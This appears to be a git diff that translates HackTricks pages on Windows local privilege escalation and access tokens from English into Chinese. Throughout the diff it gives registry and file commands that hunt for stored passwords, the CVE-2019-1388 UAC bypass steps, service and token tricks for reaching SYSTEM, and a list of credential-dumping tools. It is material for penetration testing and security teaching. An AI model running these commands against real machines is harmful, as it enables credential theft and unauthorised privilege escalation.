 Get-Childitem –Path C:\ -Include *unattend*,*sysprep* -File -Recurse -ErrorAction SilentlyContinue | where {($_.Name -like "*.xml" -or $_.Name -like "*.txt" -or $_.Name -like "*.ini")}
 ```
+### 回收站中的凭据
 
-### Credentials in the RecycleBin
+您还应该检查回收站以查找其中的凭据
 
-You should also check the Bin to look for credentials inside it
+要**恢复**由多个程序保存的密码，您可以使用: [http://www.nirsoft.net/password_recovery_tools.html](http://www.nirsoft.net/password_recovery_tools.html)
 
-To **recover passwords** saved by several programs you can use: [http://www.nirsoft.net/password_recovery_tools.html](http://www.nirsoft.net/password_recovery_tools.html)
-
-### Inside the registry
-
-**Other possible registry keys with credentials**
+### 注册表内部
 
+**其他可能包含凭据的注册表项**
 ```bash
 reg query "HKCU\Software\ORL\WinVNC3\Password"
 reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" /s
 reg query "HKCU\Software\TightVNC\Server"
 reg query "HKCU\Software\OpenSSH\Agent\Key"
 ```
+[**从注册表中提取openssh密钥。**](https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent/)
 
-[**Extract openssh keys from registry.**](https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent/)
+### 浏览器历史
 
-### Browsers History
+您应该检查存储**Chrome或Firefox**密码的数据库。\
+还要检查浏览器的历史记录、书签和收藏夹，可能会存储一些**密码**。
 
-You should check for dbs where passwords from **Chrome or Firefox** are stored.\
-Also check for the history, bookmarks and favourites of the browsers so maybe some **passwords are** stored there.
-
-Tools to extract passwords from browsers:
+从浏览器提取密码的工具：
 
 - Mimikatz: `dpapi::chrome`
 - [**SharpWeb**](https://github.com/djhohnstein/SharpWeb)
 - [**SharpChromium**](https://github.com/djhohnstein/SharpChromium)
 - [**SharpDPAPI**](https://github.com/GhostPack/SharpDPAPI)
 
-### **COM DLL Overwriting**
+### **COM DLL覆盖**
 
-**Component Object Model (COM)** is a technology built within the Windows operating system that allows **intercommunication** between software components of different languages. Each COM component is **identified via a class ID (CLSID)** and each component exposes functionality via one or more interfaces, identified via interface IDs (IIDs).
+**组件对象模型（COM）**是内置于Windows操作系统中的一种技术，允许不同语言的软件组件之间进行**互通**。每个COM组件通过类ID（CLSID）进行**标识**，每个组件通过一个或多个接口暴露功能，这些接口通过接口ID（IIDs）进行标识。
 
-COM classes and interfaces are defined in the registry under **HKEY\_**_**CLASSES\_**_**ROOT\CLSID** and **HKEY\_**_**CLASSES\_**_**ROOT\Interface** respectively. This registry is created by merging the **HKEY\_**_**LOCAL\_**_**MACHINE\Software\Classes** + **HKEY\_**_**CURRENT\_**_**USER\Software\Classes** = **HKEY\_**_**CLASSES\_**_**ROOT.**
+COM类和接口在注册表中定义，分别位于**HKEY\_**_**CLASSES\_**_**ROOT\CLSID**和**HKEY\_**_**CLASSES\_**_**ROOT\Interface**。该注册表是通过合并**HKEY\_**_**LOCAL\_**_**MACHINE\Software\Classes** + **HKEY\_**_**CURRENT\_**_**USER\Software\Classes** = **HKEY\_**_**CLASSES\_**_**ROOT**创建的。
 
-Inside the CLSIDs of this registry you can find the child registry **InProcServer32** which contains a **default value** pointing to a **DLL** and a value called **ThreadingModel** that can be **Apartment** (Single-Threaded), **Free** (Multi-Threaded), **Both** (Single or Multi) or **Neutral** (Thread Neutral).
+在该注册表的CLSID中，您可以找到子注册表**InProcServer32**，其中包含一个指向**DLL**的**默认值**和一个名为**ThreadingModel**的值，该值可以是**Apartment**（单线程）、**Free**（多线程）、**Both**（单线程或多线程）或**Neutral**（线程中立）。
 
 ![](<../../images/image (729).png>)
 
-Basically, if you can **overwrite any of the DLLs** that are going to be executed, you could **escalate privileges** if that DLL is going to be executed by a different user.
+基本上，如果您可以**覆盖任何将要执行的DLL**，如果该DLL将由不同用户执行，您就可以**提升权限**。
 
-To learn how attackers use COM Hijacking as a persistence mechanism check:
+要了解攻击者如何使用COM劫持作为持久性机制，请查看：
 
 {{#ref}}
 com-hijacking.md
 {{#endref}}
 
-### **Generic Password search in files and registry**
-
-**Search for file contents**
+### **在文件和注册表中搜索通用密码**
 
+**搜索文件内容**
 ```bash
 cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
 findstr /si password *.xml *.ini *.txt *.config
 findstr /spin "password" *.*
 ```
-
-**Search for a file with a certain filename**
-
+**搜索具有特定文件名的文件**
 ```bash
 dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
 where /R C:\ user.txt
 where /R C:\ *.ini
 ```
-
-**Search the registry for key names and passwords**
-
+**搜索注册表中的密钥名称和密码**
 ```bash
 REG QUERY HKLM /F "password" /t REG_SZ /S /K
 REG QUERY HKCU /F "password" /t REG_SZ /S /K
 REG QUERY HKLM /F "password" /t REG_SZ /S /d
 REG QUERY HKCU /F "password" /t REG_SZ /S /d
 ```
+### 搜索密码的工具
 
-### Tools that search for passwords
-
-[**MSF-Credentials Plugin**](https://github.com/carlospolop/MSF-Credentials) **is a msf** plugin I have created this plugin to **automatically execute every metasploit POST module that searches for credentials** inside the victim.\
-[**Winpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) automatically search for all the files containing passwords mentioned in this page.\
-[**Lazagne**](https://github.com/AlessandroZ/LaZagne) is another great tool to extract password from a system.
-
-The tool [**SessionGopher**](https://github.com/Arvanaghi/SessionGopher) search for **sessions**, **usernames** and **passwords** of several tools that save this data in clear text (PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP)
+[**MSF-Credentials Plugin**](https://github.com/carlospolop/MSF-Credentials) **是一个msf** 插件，我创建这个插件是为了 **自动执行每个搜索凭据的metasploit POST模块** 在受害者内部。\
+[**Winpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) 自动搜索此页面中提到的所有包含密码的文件。\
+[**Lazagne**](https://github.com/AlessandroZ/LaZagne) 是另一个从系统中提取密码的优秀工具。
 
+工具 [**SessionGopher**](https://github.com/Arvanaghi/SessionGopher) 搜索 **会话**、**用户名** 和 **密码**，这些数据以明文形式保存在多个工具中（PuTTY、WinSCP、FileZilla、SuperPuTTY 和 RDP）。
 ```bash
 Import-Module path\to\SessionGopher.ps1;
 Invoke-SessionGopher -Thorough
 Invoke-SessionGopher -AllDomain -o
 Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss
 ```
+## 泄露的句柄
 
-## Leaked Handlers
+想象一下，**一个以SYSTEM身份运行的进程**通过**完全访问**打开一个新进程（`OpenProcess()`）。同一个进程**还创建了一个新进程**（`CreateProcess()`），**具有低权限但继承了主进程的所有打开句柄**。\
+然后，如果你对这个低权限进程**拥有完全访问权限**，你可以抓取通过`OpenProcess()`创建的**特权进程的打开句柄**并**注入shellcode**。\
+[阅读这个例子以获取有关**如何检测和利用此漏洞**的更多信息。](leaked-handle-exploitation.md)\
+[阅读这篇**其他文章以获得更完整的解释，了解如何测试和滥用具有不同权限级别（不仅仅是完全访问权限）继承的进程和线程的更多打开句柄**](http://dronesec.pw/blog/2019/08/22/exploiting-leaked-process-and-thread-handles/)。
 
-Imagine that **a process running as SYSTEM open a new process** (`OpenProcess()`) with **full access**. The same process **also create a new process** (`CreateProcess()`) **with low privileges but inheriting all the open handles of the main process**.\
-Then, if you have **full access to the low privileged process**, you can grab the **open handle to the privileged process created** with `OpenProcess()` and **inject a shellcode**.\
-[Read this example for more information about **how to detect and exploit this vulnerability**.](leaked-handle-exploitation.md)\
-[Read this **other post for a more complete explanation on how to test and abuse more open handlers of processes and threads inherited with different levels of permissions (not only full access)**](http://dronesec.pw/blog/2019/08/22/exploiting-leaked-process-and-thread-handles/).
+## 命名管道客户端冒充
 
-## Named Pipe Client Impersonation
+共享内存段，称为**管道**，使进程之间能够进行通信和数据传输。
 
-Shared memory segments, referred to as **pipes**, enable process communication and data transfer.
+Windows提供了一种称为**命名管道**的功能，允许不相关的进程共享数据，甚至跨不同网络。这类似于客户端/服务器架构，角色定义为**命名管道服务器**和**命名管道客户端**。
 
-Windows provides a feature called **Named Pipes**, allowing unrelated processes to share data, even over different networks. This resembles a client/server architecture, with roles defined as **named pipe server** and **named pipe client**.
+当**客户端**通过管道发送数据时，设置管道的**服务器**有能力**承担客户端的身份**，前提是它具有必要的**SeImpersonate**权限。识别一个通过管道进行通信的**特权进程**，你可以模仿它，这提供了**获得更高权限**的机会，因为一旦它与您建立的管道交互，您就可以采用该进程的身份。有关执行此类攻击的说明，可以在[**这里**](named-pipe-client-impersonation.md)和[**这里**](./#from-high-integrity-to-system)找到有用的指南。
 
-When data is sent through a pipe by a **client**, the **server** that set up the pipe has the ability to **take on the identity** of the **client**, assuming it has the necessary **SeImpersonate** rights. Identifying a **privileged process** that communicates via a pipe you can mimic provides an opportunity to **gain higher privileges** by adopting the identity of that process once it interacts with the pipe you established. For instructions on executing such an attack, helpful guides can be found [**here**](named-pipe-client-impersonation.md) and [**here**](./#from-high-integrity-to-system).
+此外，以下工具允许**使用像burp这样的工具拦截命名管道通信：** [**https://github.com/gabriel-sztejnworcel/pipe-intercept**](https://github.com/gabriel-sztejnworcel/pipe-intercept) **而这个工具允许列出并查看所有管道以查找权限提升** [**https://github.com/cyberark/PipeViewer**](https://github.com/cyberark/PipeViewer)
 
-Also the following tool allows to **intercept a named pipe communication with a tool like burp:** [**https://github.com/gabriel-sztejnworcel/pipe-intercept**](https://github.com/gabriel-sztejnworcel/pipe-intercept) **and this tool allows to list and see all the pipes to find privescs** [**https://github.com/cyberark/PipeViewer**](https://github.com/cyberark/PipeViewer)
+## 杂项
 
-## Misc
-
-### **Monitoring Command Lines for passwords**
-
-When getting a shell as a user, there may be scheduled tasks or other processes being executed which **pass credentials on the command line**. The script below captures process command lines every two seconds and compares the current state with the previous state, outputting any differences.
+### **监控命令行中的密码**
 
+当以用户身份获取shell时，可能会有计划任务或其他进程正在执行，这些进程**在命令行中传递凭据**。下面的脚本每两秒捕获一次进程命令行，并将当前状态与先前状态进行比较，输出任何差异。
 ```powershell
 while($true)
 {
-  $process = Get-WmiObject Win32_Process | Select-Object CommandLine
-  Start-Sleep 1
-  $process2 = Get-WmiObject Win32_Process | Select-Object CommandLine
-  Compare-Object -ReferenceObject $process -DifferenceObject $process2
+$process = Get-WmiObject Win32_Process | Select-Object CommandLine
+Start-Sleep 1
+$process2 = Get-WmiObject Win32_Process | Select-Object CommandLine
+Compare-Object -ReferenceObject $process -DifferenceObject $process2
 }
 ```
+## 从进程中窃取密码
 
-## Stealing passwords from processes
+## 从低权限用户到 NT\AUTHORITY SYSTEM (CVE-2019-1388) / UAC 绕过
 
-## From Low Priv User to NT\AUTHORITY SYSTEM (CVE-2019-1388) / UAC Bypass
+如果您可以访问图形界面（通过控制台或 RDP）并且启用了 UAC，在某些版本的 Microsoft Windows 中，可以从一个无权限用户运行终端或任何其他进程，例如 "NT\AUTHORITY SYSTEM"。
 
-If you have access to the graphical interface (via console or RDP) and UAC is enabled, in some versions of Microsoft Windows it's possible to run a terminal or any other process such as "NT\AUTHORITY SYSTEM" from an unprivileged user.
-
-This makes it possible to escalate privileges and bypass UAC at the same time with the same vulnerability. Additionally, there is no need to install anything and the binary used during the process, is signed and issued by Microsoft.
-
-Some of the affected systems are the following:
+这使得可以在同一漏洞下同时提升权限并绕过 UAC。此外，无需安装任何东西，过程中使用的二进制文件是由 Microsoft 签名和发布的。
 
+一些受影响的系统如下：
 ```
 SERVER
 ======
@@ -1466,9 +1279,7 @@ Windows 10 1607	14393	** link OPENED AS SYSTEM **
 Windows 10 1703	15063	link NOT opened
 Windows 10 1709	16299	link NOT opened
 ```
-
-To exploit this vulnerability, it's necessary to perform the following steps:
-
+要利用此漏洞，必须执行以下步骤：
 ```
 1) Right click on the HHUPD.EXE file and run it as Administrator.
 
@@ -1486,61 +1297,58 @@ To exploit this vulnerability, it's necessary to perform the following steps:
 
 8) Remember to cancel setup and the UAC prompt to return to your desktop.
 ```
-
-You have all the necessary files and information in the following GitHub repository:
+您可以在以下 GitHub 存储库中找到所有必要的文件和信息：
 
 https://github.com/jas502n/CVE-2019-1388
 
-## From Administrator Medium to High Integrity Level / UAC Bypass
+## 从管理员中等到高完整性级别 / UAC 绕过
 
-Read this to **learn about Integrity Levels**:
+阅读此内容以**了解完整性级别**：
 
 {{#ref}}
 integrity-levels.md
 {{#endref}}
 
-Then **read this to learn about UAC and UAC bypasses:**
+然后**阅读此内容以了解 UAC 和 UAC 绕过：**
 
 {{#ref}}
 ../authentication-credentials-uac-and-efs/uac-user-account-control.md
 {{#endref}}
 
-## **From High Integrity to System**
+## **从高完整性到系统**
 
-### **New service**
-
-If you are already running on a High Integrity process, the **pass to SYSTEM** can be easy just **creating and executing a new service**:
+### **新服务**
 
+如果您已经在高完整性进程中运行，**切换到 SYSTEM** 可以通过**创建和执行新服务**来轻松实现：
 ```
 sc create newservicename binPath= "C:\windows\system32\notepad.exe"
 sc start newservicename
 ```
-
 ### AlwaysInstallElevated
 
-From a High Integrity process you could try to **enable the AlwaysInstallElevated registry entries** and **install** a reverse shell using a _**.msi**_ wrapper.\
-[More information about the registry keys involved and how to install a _.msi_ package here.](./#alwaysinstallelevated)
+从高完整性进程中，您可以尝试**启用 AlwaysInstallElevated 注册表项**并**使用 _**.msi**_ 包装器安装**反向 shell。\
+[有关相关注册表项和如何安装 _.msi_ 包的更多信息，请点击这里。](./#alwaysinstallelevated)
 
 ### High + SeImpersonate privilege to System
 
-**You can** [**find the code here**](seimpersonate-from-high-to-system.md)**.**
+**您可以** [**在这里找到代码**](seimpersonate-from-high-to-system.md)**。**
 
 ### From SeDebug + SeImpersonate to Full Token privileges
 
-If you have those token privileges (probably you will find this in an already High Integrity process), you will be able to **open almost any process** (not protected processes) with the SeDebug privilege, **copy the token** of the process, and create an **arbitrary process with that token**.\
-Using this technique is usually **selected any process running as SYSTEM with all the token privileges** (_yes, you can find SYSTEM processes without all the token privileges_).\
-**You can find an** [**example of code executing the proposed technique here**](sedebug-+-seimpersonate-copy-token.md)**.**
+如果您拥有这些令牌权限（您可能会在已经是高完整性进程中找到），您将能够**以 SeDebug 权限打开几乎任何进程**（不受保护的进程），**复制该进程的令牌**，并创建一个**具有该令牌的任意进程**。\
+使用此技术通常**选择任何以 SYSTEM 身份运行的进程，具有所有令牌权限**（_是的，您可以找到没有所有令牌权限的 SYSTEM 进程_）。\
+**您可以在这里找到** [**执行所提议技术的代码示例**](sedebug-+-seimpersonate-copy-token.md)**。**
 
 ### **Named Pipes**
 
-This technique is used by meterpreter to escalate in `getsystem`. The technique consists on **creating a pipe and then create/abuse a service to write on that pipe**. Then, the **server** that created the pipe using the **`SeImpersonate`** privilege will be able to **impersonate the token** of the pipe client (the service) obtaining SYSTEM privileges.\
-If you want to [**learn more about name pipes you should read this**](./#named-pipe-client-impersonation).\
-If you want to read an example of [**how to go from high integrity to System using name pipes you should read this**](from-high-integrity-to-system-with-name-pipes.md).
+此技术被 meterpreter 用于在 `getsystem` 中进行升级。该技术包括**创建一个管道，然后创建/滥用一个服务来写入该管道**。然后，**使用 `SeImpersonate` 权限创建管道的**服务器将能够**模拟管道客户端（服务）的令牌**，从而获得 SYSTEM 权限。\
+如果您想要[**了解更多关于命名管道的信息，您应该阅读这个**](./#named-pipe-client-impersonation)。\
+如果您想阅读一个[**如何通过命名管道从高完整性转到系统的示例，您应该阅读这个**](from-high-integrity-to-system-with-name-pipes.md)。
 
 ### Dll Hijacking
 
-If you manages to **hijack a dll** being **loaded** by a **process** running as **SYSTEM** you will be able to execute arbitrary code with those permissions. Therefore Dll Hijacking is also useful to this kind of privilege escalation, and, moreover, if far **more easy to achieve from a high integrity process** as it will have **write permissions** on the folders used to load dlls.\
-**You can** [**learn more about Dll hijacking here**](dll-hijacking/)**.**
+如果您设法**劫持一个由以**SYSTEM**身份运行的**进程**加载的 dll，您将能够以这些权限执行任意代码。因此，Dll Hijacking 对于这种特权升级也很有用，而且，如果从高完整性进程进行，**更容易实现**，因为它将对加载 dll 的文件夹具有**写权限**。\
+**您可以** [**在这里了解更多关于 Dll 劫持的信息**](dll-hijacking/)**。**
 
 ### **From Administrator or Network Service to System**
 
@@ -1548,7 +1356,7 @@ If you manages to **hijack a dll** being **loaded** by a **process** running as
 
 ### From LOCAL SERVICE or NETWORK SERVICE to full privs
 
-**Read:** [**https://github.com/itm4n/FullPowers**](https://github.com/itm4n/FullPowers)
+**阅读：** [**https://github.com/itm4n/FullPowers**](https://github.com/itm4n/FullPowers)
 
 ## More help
 
@@ -1556,51 +1364,49 @@ If you manages to **hijack a dll** being **loaded** by a **process** running as
 
 ## Useful tools
 
-**Best tool to look for Windows local privilege escalation vectors:** [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)
+**查找 Windows 本地特权升级向量的最佳工具：** [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)
 
 **PS**
 
 [**PrivescCheck**](https://github.com/itm4n/PrivescCheck)\
-[**PowerSploit-Privesc(PowerUP)**](https://github.com/PowerShellMafia/PowerSploit) **-- Check for misconfigurations and sensitive files (**[**check here**](https://github.com/carlospolop/hacktricks/blob/master/windows/windows-local-privilege-escalation/broken-reference/README.md)**). Detected.**\
-[**JAWS**](https://github.com/411Hall/JAWS) **-- Check for some possible misconfigurations and gather info (**[**check here**](https://github.com/carlospolop/hacktricks/blob/master/windows/windows-local-privilege-escalation/broken-reference/README.md)**).**\
-[**privesc** ](https://github.com/enjoiz/Privesc)**-- Check for misconfigurations**\
-[**SessionGopher**](https://github.com/Arvanaghi/SessionGopher) **-- It extracts PuTTY, WinSCP, SuperPuTTY, FileZilla, and RDP saved session information. Use -Thorough in local.**\
-[**Invoke-WCMDump**](https://github.com/peewpw/Invoke-WCMDump) **-- Extracts crendentials from Credential Manager. Detected.**\
-[**DomainPasswordSpray**](https://github.com/dafthack/DomainPasswordSpray) **-- Spray gathered passwords across domain**\
-[**Inveigh**](https://github.com/Kevin-Robertson/Inveigh) **-- Inveigh is a PowerShell ADIDNS/LLMNR/mDNS/NBNS spoofer and man-in-the-middle tool.**\
-[**WindowsEnum**](https://github.com/absolomb/WindowsEnum/blob/master/WindowsEnum.ps1) **-- Basic privesc Windows enumeration**\
-[~~**Sherlock**~~](https://github.com/rasta-mouse/Sherlock) **\~\~**\~\~ -- Search for known privesc vulnerabilities (DEPRECATED for Watson)\
-[~~**WINspect**~~](https://github.com/A-mIn3/WINspect) -- Local checks **(Need Admin rights)**
+[**PowerSploit-Privesc(PowerUP)**](https://github.com/PowerShellMafia/PowerSploit) **-- 检查错误配置和敏感文件 (**[**在这里检查**](https://github.com/carlospolop/hacktricks/blob/master/windows/windows-local-privilege-escalation/broken-reference/README.md)**)。已检测。**\
+[**JAWS**](https://github.com/411Hall/JAWS) **-- 检查一些可能的错误配置并收集信息 (**[**在这里检查**](https://github.com/carlospolop/hacktricks/blob/master/windows/windows-local-privilege-escalation/broken-reference/README.md)**)。**\
+[**privesc** ](https://github.com/enjoiz/Privesc)**-- 检查错误配置**\
+[**SessionGopher**](https://github.com/Arvanaghi/SessionGopher) **-- 提取 PuTTY、WinSCP、SuperPuTTY、FileZilla 和 RDP 保存的会话信息。使用 -Thorough 在本地。**\
+[**Invoke-WCMDump**](https://github.com/peewpw/Invoke-WCMDump) **-- 从凭据管理器提取凭据。已检测。**\
+[**DomainPasswordSpray**](https://github.com/dafthack/DomainPasswordSpray) **-- 在域中喷洒收集到的密码**\
+[**Inveigh**](https://github.com/Kevin-Robertson/Inveigh) **-- Inveigh 是一个 PowerShell ADIDNS/LLMNR/mDNS/NBNS 欺骗和中间人工具。**\
+[**WindowsEnum**](https://github.com/absolomb/WindowsEnum/blob/master/WindowsEnum.ps1) **-- 基本的 privesc Windows 枚举**\
+[~~**Sherlock**~~](https://github.com/rasta-mouse/Sherlock) **\~\~**\~\~ -- 搜索已知的 privesc 漏洞（已弃用，改为 Watson）\
+[~~**WINspect**~~](https://github.com/A-mIn3/WINspect) -- 本地检查 **(需要管理员权限)**
 
 **Exe**
 
-[**Watson**](https://github.com/rasta-mouse/Watson) -- Search for known privesc vulnerabilities (needs to be compiled using VisualStudio) ([**precompiled**](https://github.com/carlospolop/winPE/tree/master/binaries/watson))\
-[**SeatBelt**](https://github.com/GhostPack/Seatbelt) -- Enumerates the host searching for misconfigurations (more a gather info tool than privesc) (needs to be compiled) **(**[**precompiled**](https://github.com/carlospolop/winPE/tree/master/binaries/seatbelt)**)**\
-[**LaZagne**](https://github.com/AlessandroZ/LaZagne) **-- Extracts credentials from lots of softwares (precompiled exe in github)**\
-[**SharpUP**](https://github.com/GhostPack/SharpUp) **-- Port of PowerUp to C#**\
-[~~**Beroot**~~](https://github.com/AlessandroZ/BeRoot) **\~\~**\~\~ -- Check for misconfiguration (executable precompiled in github). Not recommended. It does not work well in Win10.\
-[~~**Windows-Privesc-Check**~~](https://github.com/pentestmonkey/windows-privesc-check) -- Check for possible misconfigurations (exe from python). Not recommended. It does not work well in Win10.
+[**Watson**](https://github.com/rasta-mouse/Watson) -- 搜索已知的 privesc 漏洞（需要使用 VisualStudio 编译） ([**预编译**](https://github.com/carlospolop/winPE/tree/master/binaries/watson))\
+[**SeatBelt**](https://github.com/GhostPack/Seatbelt) -- 枚举主机以查找错误配置（更多是收集信息工具而非 privesc）（需要编译） **(**[**预编译**](https://github.com/carlospolop/winPE/tree/master/binaries/seatbelt)**)**\
+[**LaZagne**](https://github.com/AlessandroZ/LaZagne) **-- 从许多软件中提取凭据（GitHub 上的预编译 exe）**\
+[**SharpUP**](https://github.com/GhostPack/SharpUp) **-- PowerUp 的 C# 移植**\
+[~~**Beroot**~~](https://github.com/AlessandroZ/BeRoot) **\~\~**\~\~ -- 检查错误配置（GitHub 上的可执行文件预编译）。不推荐。它在 Win10 上效果不好。\
+[~~**Windows-Privesc-Check**~~](https://github.com/pentestmonkey/windows-privesc-check) -- 检查可能的错误配置（来自 Python 的 exe）。不推荐。它在 Win10 上效果不好。
 
 **Bat**
 
-[**winPEASbat** ](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)-- Tool created based in this post (it does not need accesschk to work properly but it can use it).
+[**winPEASbat** ](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)-- 基于此帖创建的工具（它不需要 accesschk 正常工作，但可以使用它）。
 
 **Local**
 
-[**Windows-Exploit-Suggester**](https://github.com/GDSSecurity/Windows-Exploit-Suggester) -- Reads the output of **systeminfo** and recommends working exploits (local python)\
-[**Windows Exploit Suggester Next Generation**](https://github.com/bitsadmin/wesng) -- Reads the output of **systeminfo** andrecommends working exploits (local python)
+[**Windows-Exploit-Suggester**](https://github.com/GDSSecurity/Windows-Exploit-Suggester) -- 读取 **systeminfo** 的输出并推荐有效的漏洞（本地 Python）\
+[**Windows Exploit Suggester Next Generation**](https://github.com/bitsadmin/wesng) -- 读取 **systeminfo** 的输出并推荐有效的漏洞（本地 Python）
 
 **Meterpreter**
 
 _multi/recon/local_exploit_suggestor_
 
-You have to compile the project using the correct version of .NET ([see this](https://rastamouse.me/2018/09/a-lesson-in-.net-framework-versions/)). To see the installed version of .NET on the victim host you can do:
-
+您必须使用正确版本的 .NET 编译该项目（[查看此处](https://rastamouse.me/2018/09/a-lesson-in-.net-framework-versions/)）。要查看受害主机上安装的 .NET 版本，您可以执行：
 ```
 C:\Windows\microsoft.net\framework\v4.0.30319\MSBuild.exe -version #Compile the code with the version given in "Build Engine version" line
 ```
-
-## Bibliography
+## 参考书目
 
 - [http://www.fuzzysecurity.com/tutorials/16.html](http://www.fuzzysecurity.com/tutorials/16.html)\\
 - [http://www.greyhathacker.net/?p=738](http://www.greyhathacker.net/?p=738)\\
@@ -1618,4 +1424,3 @@ C:\Windows\microsoft.net\framework\v4.0.30319\MSBuild.exe -version #Compile the
 - [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#antivirus--detections](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#antivirus--detections)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/windows-local-privilege-escalation/access-tokens.md b/src/windows-hardening/windows-local-privilege-escalation/access-tokens.md
index 1d69a45f6..9f7a8529f 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/access-tokens.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/access-tokens.md
@@ -4,10 +4,9 @@
 
 ## Access Tokens
 
-Each **user logged** onto the system **holds an access token with security information** for that logon session. The system creates an access token when the user logs on. **Every process executed** on behalf of the user **has a copy of the access token**. The token identifies the user, the user's groups, and the user's privileges. A token also contains a logon SID (Security Identifier) that identifies the current logon session.
-
-You can see this information executing `whoami /all`
+每个**登录**到系统的**用户持有一个包含安全信息的访问令牌**，用于该登录会话。当用户登录时，系统会创建一个访问令牌。**每个代表用户执行的进程**都有一个访问令牌的副本。该令牌标识用户、用户的组和用户的权限。令牌还包含一个登录SID（安全标识符），用于标识当前的登录会话。
 
+您可以通过执行 `whoami /all` 查看此信息。
 ```
 whoami /all
 
@@ -51,61 +50,55 @@ SeUndockPrivilege             Remove computer from docking station Disabled
 SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
 SeTimeZonePrivilege           Change the time zone                 Disabled
 ```
-
-or using _Process Explorer_ from Sysinternals (select process and access"Security" tab):
+或使用来自 Sysinternals 的 _Process Explorer_（选择进程并访问“安全”选项卡）：
 
 ![](<../../images/image (772).png>)
 
-### Local administrator
+### 本地管理员
 
-When a local administrator logins, **two access tokens are created**: One with admin rights and other one with normal rights. **By default**, when this user executes a process the one with **regular** (non-administrator) **rights is used**. When this user tries to **execute** anything **as administrator** ("Run as Administrator" for example) the **UAC** will be used to ask for permission.\
-If you want to [**learn more about the UAC read this page**](../authentication-credentials-uac-and-efs/#uac)**.**
+当本地管理员登录时，**会创建两个访问令牌**：一个具有管理员权限，另一个具有普通权限。**默认情况下**，当该用户执行进程时，使用的是具有**常规**（非管理员）**权限的令牌**。当该用户尝试**以管理员身份执行**任何操作（例如“以管理员身份运行”）时，**UAC** 将被用来请求权限。\
+如果您想要[**了解更多关于 UAC 的信息，请阅读此页面**](../authentication-credentials-uac-and-efs/#uac)**。**
 
-### Credentials user impersonation
-
-If you have **valid credentials of any other user**, you can **create** a **new logon session** with those credentials :
+### 凭据用户冒充
 
+如果您拥有**任何其他用户的有效凭据**，您可以**使用这些凭据创建**一个**新的登录会话**：
 ```
 runas /user:domain\username cmd.exe
 ```
-
-The **access token** has also a **reference** of the logon sessions inside the **LSASS**, this is useful if the process needs to access some objects of the network.\
-You can launch a process that **uses different credentials for accessing network services** using:
-
+**访问令牌**还包含**LSASS**内部登录会话的**引用**，这在进程需要访问网络的一些对象时非常有用。\
+您可以使用以下方法启动一个**使用不同凭据访问网络服务**的进程：
 ```
 runas /user:domain\username /netonly cmd.exe
 ```
+如果您拥有用于访问网络中对象的有效凭据，但这些凭据在当前主机中无效，因为它们仅将在网络中使用（在当前主机中将使用您当前用户的权限），这将非常有用。
 
-This is useful if you have useful credentials to access objects in the network but those credentials aren't valid inside the current host as they are only going to be used in the network (in the current host your current user privileges will be used).
+### 令牌类型
 
-### Types of tokens
+可用的令牌有两种类型：
 
-There are two types of tokens available:
+- **Primary Token**：它作为进程安全凭据的表示。创建和将主令牌与进程关联的操作需要提升的权限，强调了权限分离的原则。通常，身份验证服务负责令牌的创建，而登录服务则处理其与用户操作系统外壳的关联。值得注意的是，进程在创建时会继承其父进程的主令牌。
+- **Impersonation Token**：使服务器应用程序能够暂时采用客户端的身份以访问安全对象。该机制分为四个操作级别：
+  - **Anonymous**：授予服务器与未识别用户相似的访问权限。
+  - **Identification**：允许服务器验证客户端的身份，而不利用其进行对象访问。
+  - **Impersonation**：使服务器能够在客户端身份下操作。
+  - **Delegation**：类似于Impersonation，但包括将此身份假设扩展到服务器交互的远程系统的能力，以确保凭据的保留。
 
-- **Primary Token**: It serves as a representation of a process's security credentials. The creation and association of primary tokens with processes are actions that require elevated privileges, emphasizing the principle of privilege separation. Typically, an authentication service is responsible for token creation, while a logon service handles its association with the user's operating system shell. It is worth noting that processes inherit the primary token of their parent process at creation.
-- **Impersonation Token**: Empowers a server application to adopt the client's identity temporarily for accessing secure objects. This mechanism is stratified into four levels of operation:
-  - **Anonymous**: Grants server access akin to that of an unidentified user.
-  - **Identification**: Allows the server to verify the client's identity without utilizing it for object access.
-  - **Impersonation**: Enables the server to operate under the client's identity.
-  - **Delegation**: Similar to Impersonation but includes the ability to extend this identity assumption to remote systems the server interacts with, ensuring credential preservation.
+#### 模拟令牌
 
-#### Impersonate Tokens
+使用metasploit的 _**incognito**_ 模块，如果您拥有足够的权限，您可以轻松地 **列出** 和 **模拟** 其他 **令牌**。这可能有助于执行 **作为其他用户的操作**。您还可以使用此技术 **提升权限**。
 
-Using the _**incognito**_ module of metasploit if you have enough privileges you can easily **list** and **impersonate** other **tokens**. This could be useful to perform **actions as if you where the other user**. You could also **escalate privileges** with this technique.
+### 令牌权限
 
-### Token Privileges
-
-Learn which **token privileges can be abused to escalate privileges:**
+了解哪些 **令牌权限可以被滥用以提升权限：**
 
 {{#ref}}
 privilege-escalation-abusing-tokens.md
 {{#endref}}
 
-Take a look to [**all the possible token privileges and some definitions on this external page**](https://github.com/gtworek/Priv2Admin).
+查看 [**所有可能的令牌权限及其一些定义在此外部页面**](https://github.com/gtworek/Priv2Admin)。
 
-## References
+## 参考
 
